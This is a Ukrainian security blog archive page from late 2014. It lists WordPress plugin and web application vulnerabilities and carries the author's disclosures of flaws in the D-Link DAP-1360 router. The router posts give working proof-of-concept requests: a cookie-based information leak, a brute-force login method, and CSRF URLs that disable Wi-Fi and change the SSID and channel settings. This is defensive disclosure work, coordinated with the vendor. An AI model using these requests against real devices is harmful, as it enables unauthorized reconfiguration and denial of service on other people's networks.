Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №160

23:57 01.11.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах LineNity, JS External Link Info та Echelon. Для котрих з’явилися експлоіти. LineNity - це тема движка, JS External Link Info - це плагін для перетворення зовнішніх лінок на інформаційні сторінки, Echelon - це тема движка.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

IL та CSRF уразливості в D-Link DAP-1360

17:03 01.11.2014

24.05.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Information Leakage та Cross-Site Request Forgery уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

01.11.2014

Information Leakage (WASC-13):

Запит без авторизації http://192.168.0.50/index.cgi?v2=y&rq=4.

Cookie: cookie_lang=1; client_login=admin; client_password=1

Лише зі вказанням кукіса (з логіном, який є фіксованим, і довільним паролем) можна отримати достатньо інформації про пристрій (IP, MAC та інше). Це можна зробити при локальному доступі, через LAN і через Internet через XSS уразливість.

CSRF (WASC-09):

В розділі Wi-Fi - Common settings можна змінити параметри Enable Wireless, MBSSID, BSSID.

Вимкнути Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

Увімкнути Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}

В розділі Wi-Fi - Basic settings можна змінити параметри Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

Нова версія прошивки з виправленням даних уразливостей вийде в першій половині листопада.

Добірка уразливостей

17:25 30.10.2014

В даній добірці уразливості в веб додатках:

  • NETGEAR ReadyNAS Remote Root (деталі)
  • Spring Security Blank password may bypass user authentication (деталі)
  • XSS when using Spring MVC (деталі)
  • SQL injection in InterWorx Web Control Panel <= 5.0.13 (деталі)
  • Watchguard Server Center v11.7.4 Multiple Non-Persistent Cross-Site Scripting Vulnerabilities (деталі)

Уразливості в плагінах для WordPress №159

23:54 28.10.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Felici, Custom, HTML Sitemap та Quick Page/Post Redirect. Для котрих з’явилися експлоіти. Felici, Custom - це теми движка, HTML Sitemap - це плагін для створення карти сайта, Quick Page/Post Redirect - це плагін для створення перенаправлення в постах і сторінках сайта.

  • WordPress Felici / Custom Background Shell Upload (деталі)
  • WordPress HTML Sitemap 1.2 Cross Site Request Forgery (деталі)
  • WordPress Quick Page/Post Redirect Plugin 5.0.3 CSRF / XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:24 28.10.2014

В даній добірці уразливості в веб додатках:

  • openssl security update (деталі)
  • Local File Inclusion in Vtiger CRM (деталі)
  • SQL Injection in Procentia IntelliPen (деталі)
  • Spring MVC Incomplete fix for CVE-2013-4152 / CVE-2013-6429 (XXE) (деталі)
  • RSA Authentication Agent for Web for Internet Information Services (IIS) Security Controls Bypass Vulnerability (деталі)

Уразливості в D-Link DAP-1360

23:54 25.10.2014

21.05.2014

У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Abuse of Functionality, Brute Force та Cross-Site Request Forgery уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Раніше я вже писав про численні уразливості в D-Link DAP 1150.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

25.10.2014

Abuse of Functionality (WASC-42):

Логін постійний: admin.

Brute Force (WASC-11):

В формі логіна http://192.168.0.50 немає захисту від Brute Force атак.

Для атаки потрібно відправляти кукіс з логіном і паролем:

Cookie: cookie_lang=ukr; client_login=admin; client_password=1

Cross-Site Request Forgery (WASC-09):

Відсутність захисту від Brute Force (такого як капча) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін. Що стане в нагоді при проведенні атак на різні CSRF уразливості в панелі керування.

Для атаки потрібно відправляти кукіс з логіном і паролем (він може бути вказаний використовуючи Flash чи інший плагін):

Cookie: cookie_lang=ukr; client_login=admin; client_password=1

Нова версія прошивки з виправленням даних уразливостей вийде в першій половині листопада, за виключенням AoF дірки, яку вони не будуть виправляти.

Добірка уразливостей

16:25 23.10.2014

В даній добірці уразливості в веб додатках:

  • RSA Authentication Agent for PAM Unlimited Login Attempts Vulnerability (деталі)
  • ClanSphere ‘where’ Cross Site Scripting Vulnerability (деталі)
  • E-Store (1.0 & 2.0) <= SQL Injection Vulnerability (деталі)
  • Synology DSM4 Blind SQL Injection (деталі)
  • librack-ruby regression update (деталі)

Уразливості в плагінах для WordPress №158

23:57 22.10.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах LayerSlider, Vithy, Appius, Dagda, Vector, Shotzz та Business Intelligence. Для котрих з’явилися експлоіти. LayerSlider - це плагін для створення слайдеру, Vithy, Appius, Dagda, Vector, Shotzz - це теми движка, Business Intelligence - це плагін для створення графіків і таблиць.

  • WordPress LayerSlider 4.6.1 CSRF / Traversal (деталі)
  • WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload (деталі)
  • WordPress Business Intelligence 1.0.6 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:19 21.10.2014

В даній добірці уразливості в веб додатках:

  • Samsung DVR authentication bypass (деталі)
  • Persistent HTML Script Insertion permits offsite-bound forms in SpagoBI v4.0 (деталі)
  • XSS File Upload in SpagoBI v4.0 (деталі)
  • JOIDS (Java OpenID Server) multiple vulnerabilities (деталі)
  • Netgear ProSafe switches: Unauthenticated startup-config disclosure and Denial of Service (деталі)

Уразливості в плагінах для WordPress №157

23:51 18.10.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Alpine PhotoTile For Instagram, Barclaycart та Premium Gallery Manager. Для котрих з’явилися експлоіти. Alpine PhotoTile For Instagram - це плагін для інтеграграції з Instagram, Barclaycart - це плагін для онлайн магазину, Premium Gallery Manager - це плагін для створення галерей зображень.

  • WordPress Alpine PhotoTile For Instagram 1.2.6.5 XSS (деталі)
  • WordPress Barclaycart Shell Upload (деталі)
  • WordPress Premium Gallery Manager Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.